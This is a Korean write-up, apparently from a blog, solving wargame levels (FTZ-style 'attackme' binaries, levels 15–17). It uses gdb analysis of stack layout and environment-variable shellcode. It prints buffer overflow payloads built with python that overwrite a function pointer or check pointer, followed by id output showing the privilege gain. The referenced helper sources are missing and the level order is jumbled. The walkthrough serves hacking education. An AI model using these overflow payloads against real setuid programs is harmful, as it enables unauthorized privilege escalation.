bash2실행하고 gdb로 까봤다

스택에 16바이트가 할당되어있다. 역시 더미가 없으므로 메모리구조를 생각해보면

| buffer(16Byte) | sfp(4Byte) | ret(4Byte) |

이렇게 된다. 버퍼의 크기가 작아 버퍼에 쉘코드를 쓰는 대신 환경변수를 이용해 풀겠다

NOP과 쉘코드가 있는 환경변수 shellcode를 등록하고 주소를 찾았다.

*환경변수 주소를 구하는 소스

페이로드와 결과

-hint 

간단한 문제다 

void (*call)()=printit; 

포인터 함수 *call이 사용자 정의 함수 printit의 주소를 가르키고 있으므로

함수 shell의 시작주소를 대신 채워주면 쉘을 획득할 수 있다.

gdb로 shell함수를 디스어셈블해보면

0x080484d0 <shell+0>: push   %ebp

함수 shell의 시작주소는 0x080484d0이다

buf와 *call의 거리는 level15처럼 구하면

40이므로 40개를 채워주고 shell함수의 주소를 채우면 

(python -c 'print "A"*40 + "\xd0\x84\x04\x08"';cat) | ./attackme

id

uid=3097(level17) gid=3096(level16) groups=3096(level16)

성공

my-pass

Level17 Password

*check 포인터 변수는 입력받은 값을 주소로 받아

그 주소 안에 있는 값을 참조하므로

*check가 참조하는 값이 deadbeef가 되어야 한다

환경변수선언

export shellcode=`python -c 'print "\xef\xbe\xad\xde"'` 

*check에 shellcode 주소를 채우기만 하면 된다.

환경변수 주소 찾기

-앞에서 나온 주소 찾기 소스는 대략적인 위치만을 찾아 NOP Sled를 사용해 쉘코드를 실행시켰지만

이문제는 환경변수의 정확한 시작 주소를 찾아야 하기 때문에 아래의 소스를 쓴다

--get.c

 //USAGE ./get 환경변수이름/ target의절대경로

./get shellcode /home/level15/attackme

Use Address : 0xbffffeff

공격 코드는

(python -c 'print "A"*40 + "\xff\xfe\xff\xbf"';cat) | /home/level15/attackme

id

uid=3096(level16) gid=3095(level15) groups=3095(level15)

my-pass

Level16 Password